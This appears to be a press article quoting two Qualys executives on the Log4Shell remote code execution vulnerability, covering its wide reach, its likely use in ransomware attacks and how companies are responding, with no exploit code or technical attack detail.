The novel security vulnerability Log4Shell keeps security managers in suspense and will continue to endanger IT security in companies. The full current and future extent of the vulnerability is not yet foreseeable.
“Due to the fact that Log4Shell is so basic and ubiquitous, the severity and attack surface that the vulnerability provides is unsurpassed,” says Travis Smith, Director of Malware Threat Research at Qualys. “If young people decide to pursue a career in the field of cyber security, they will still be dealing with this vulnerability fifteen years from now.
It is a remote code execution (RCE) vulnerability. It will bring great success to sophisticated attackers like Conti, as it allows lateral movements, reconnaissance efforts and, ultimately, the spread of ransomware. In addition, Log4Shell occurs at a time when employees are desperately trying to process the inbox before the holidays. Since the latest version allows exploitation via local systems, human error is an important attack vector. Companies must therefore secure themselves beyond their borders – or rather: within their borders – in order to protect their data.
This vulnerability is obviously new for defenders, but also new for malicious actors. The better it is understood, the more it will be used for malware and especially for ransomware attacks. The exploitation of this vulnerability will develop in a new way, with industries such as manufacturing, where it is difficult to patch, becoming a popular target for attack. Log4Shell ultimately becomes an important point of attack for malicious actors who are targeting critical infrastructures.“
Mehul Revankar, VP of VMDR at Qualys
Mehul Revankar, VP of VMDR (Vulnerability Management, Detection, and Response) at Qualys says: “SolarWinds, Colonial Pipeline, MSFT Exchange and now Log4Shell… there is always talk that these events are a “wake-up call”. But all we have done so far has been to press the snooze button. However, Log4Shell offers an unprecedented scale and due to the fact that the vulnerability is not easy to find, it is for me the most risky vulnerability that I have seen in my two decades of tenure in the field of cybersecurity.
A good practice of cyber security is to push for more logging. In this case, however, the more logged, the more vulnerable you are. We have a global Fortune 50 manufacturing company whose CISO has given the order to completely take all servers off the grid if the Log4Shell vulnerabilities are not fixed within a few days. Log4Shell is so serious that companies refuse to put systems online until they know that this threat has been eliminated. In addition, there is concern that employees will also fall victim to human exploitation attempts.“